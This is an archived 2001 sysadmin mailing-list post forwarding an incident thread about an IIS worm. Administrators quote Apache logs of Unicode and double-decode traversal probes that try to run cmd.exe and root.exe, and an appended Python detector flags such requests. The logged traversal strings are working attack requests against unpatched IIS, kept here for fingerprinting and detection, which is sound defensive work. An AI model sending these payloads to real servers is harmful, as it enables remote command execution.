ARCHIVE :: Inet-Admins
Inet-Admins mailing list archive (inet-admins@info.east.ru)


[inet-admins] Re: CodeBlue finally hitting, or what? (fwd)


  • To: inet-admins@info.east.ru
  • Subject: [inet-admins] Re: CodeBlue finally hitting, or what? (fwd)
  • From: Dmitry Valdov <dv@dv.ru>
  • Date: Tue, 18 Sep 2001 20:49:20 +0400 (MSD)
  • Delivered-to: inet-adm-outgoing@frog.east.ru
  • Delivered-to: inet-admins@info.east.ru

Hi!

Another IIS worm. Right now its requests are pouring into my Apache logs
at a rate of several screens a minute.

The nastiest part is that on infected sites it modifies the document so that
a window pops up with a supposed e-mail carrying an attached file readme.exe with the WAV type.
People say IE5 runs it without asking.

So on top of infecting IIS servers it also infects client machines
too..

The traffic from it right now is enormous. :(

Dmitry.



---------- Forwarded message ----------
Date: Tue, 18 Sep 2001 11:36:35 -0400
From: Jason Giglio <jgiglio@netmar.com>
To: "Portnoy, Gary" <gportnoy@belenosinc.com>, incidents@securityfocus.com,
    forensics@securityfocus.com
Subject: Re: CodeBlue finally hitting, or what?

I've gotten 721 hits just today for cmd.exe of some sort.  We run apache so
no worries, but this worm has hit faster than anything I've seen before.

All from the people that share the same class A as us.  This one must scan
its own class C then B then A first.  (I know I'm probably abusing the
terms, but you all know what I mean)


65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 320
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 320





On 2001.09.18 10:24 "Portnoy, Gary" wrote:
> Greetings,
> 
> I am suddenly seeing hundreds of Unicode traversal requests coming in from
> all over the world, many of them from previous CodeRed victims.  I am
> guessing someone changed CodeBlue to make it spread faster, because before I
> saw maybe 1 or 2 CodeBlue attempts a day, and so far I've seen at least 20
> in the last hour.  Just a way to help fingerprint it, a few of the
> attempted exploits use the multiple decode vulnerability....
> 
> -Gary-
> 
> 12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET
> /scripts/root.exe?/c+dir
> HTTP/1.0" 404 287 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET
> /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 285 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 326 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 326 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-"
> "-"
> 
> Gary Portnoy
> Network Administrator
> gportnoy@belenosinc.com
> 
> PGP Fingerprint: 9D69 6A39 642D 78FD 207C  307D B37D E01A 2E89 9D2C
> 
> 
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management 
> and tracking system please see: http://aris.securityfocus.com
> 
> 
--
Jason Giglio
Information Technology Coordinator, Smyth Companies, Bedford VA
Phone: 540-586-2311x113
e-mail: jgiglio@smythco.com

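The log lines quoted above are the kind of thing people end up grepping for by hand. As an added example (not from the thread and not from any of the posters), here is a small Python detector that parses Apache access-log lines, decodes the request path the lenient way the "multiple decode" traversals rely on (double percent-decoding, so %255c becomes %5c and then a backslash, plus folding of overlong two-byte sequences such as %c0%af and %c1%1c into the '/' and '\' they stand for), and tallies cmd.exe/root.exe probes per source address. The sample log text is constructed from the entries quoted in the thread, and the function names (`lax_decode`, `classify`, `scan`) and the two-pass decoding depth are my own assumptions, not anything the posters described.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample: Apache common/combined log lines modelled on the ones
# quoted in the thread, plus one ordinary request for contrast.
SAMPLE_LOG = """\
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
10.0.0.5 - - [18/Sep/2001:10:20:00 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
"""

# ip ident user [timestamp] "METHOD target [protocol]" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3})'
)
# 0xC0/0xC1 never start a valid UTF-8 sequence, so matching only those lead
# bytes catches the "overlong" encodings without touching real UTF-8 text.
OVERLONG_RE = re.compile(rb'[\xc0\xc1]([\x00-\xff])')
PROBE_NAMES = ('cmd.exe', 'root.exe')


def lax_decode(path, passes=2):
    """Decode a request path the way an over-lenient server would (assumed
    model): percent-decode `passes` times, then fold overlong two-byte
    sequences into the single ASCII byte their low bits encode."""
    data = path.encode('ascii', 'replace')
    for _ in range(passes):
        data = unquote_to_bytes(data)

    def fold(m):
        lead, trail = m.group(0)[0], m.group(1)[0]
        return bytes([((lead & 0x1f) << 6) | (trail & 0x3f)])

    return OVERLONG_RE.sub(fold, data).decode('latin-1')


def classify(target):
    """Return a finding dict if the request targets a shell binary, else None."""
    path = target.split('?', 1)[0]
    decoded = lax_decode(path).replace('\\', '/').lower()
    name = next((n for n in PROBE_NAMES if decoded.endswith('/' + n)), None)
    if name is None:
        return None
    traversal = '/../' in decoded
    # "hidden" = the traversal only shows up after lenient decoding, i.e. a
    # plain string match on the raw path would have missed it.
    hidden = traversal and '/../' not in path.replace('\\', '/')
    return {'name': name, 'traversal': traversal, 'hidden': hidden}


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(log_text):
    """Parse every line, flag shell probes, and tally them per source IP."""
    findings, per_ip = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        hit = classify(rec['target'])
        if hit:
            findings.append({**rec, **hit})
            per_ip[rec['ip']] += 1
    return findings, per_ip


if __name__ == '__main__':
    found, counts = scan(SAMPLE_LOG)
    for f in found:
        kind = ('encoded traversal' if f['hidden']
                else 'traversal' if f['traversal'] else 'direct')
        print(f"{f['ip']:15} {f['status']} {kind:17} {f['target']}")
    print('probes per source:', dict(counts))
```

Running it over the sample prints one line per probe and a count of 2 for 65.114.21.16 and 4 for 12.27.232.252, with the ordinary index.html request ignored. The point of decoding before matching is that a rule keyed on the literal string `../` misses every `%255c`, `%c1%1c` and `%c0%af` variant in the thread, while a rule keyed on the decoded path catches all of them; folding only C0/C1 lead bytes keeps legitimate UTF-8 paths intact.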



=============================================================================
"inet-admins" Internet access mailing list. Maintained by East Connection ISP.
Mail "unsubscribe inet-admins" to Majordomo@info.east.ru if you want to quit.
Archive is accessible on http://info.east.ru/rus/inetadm.html
Copyright © Lexa Software, 1996-2009.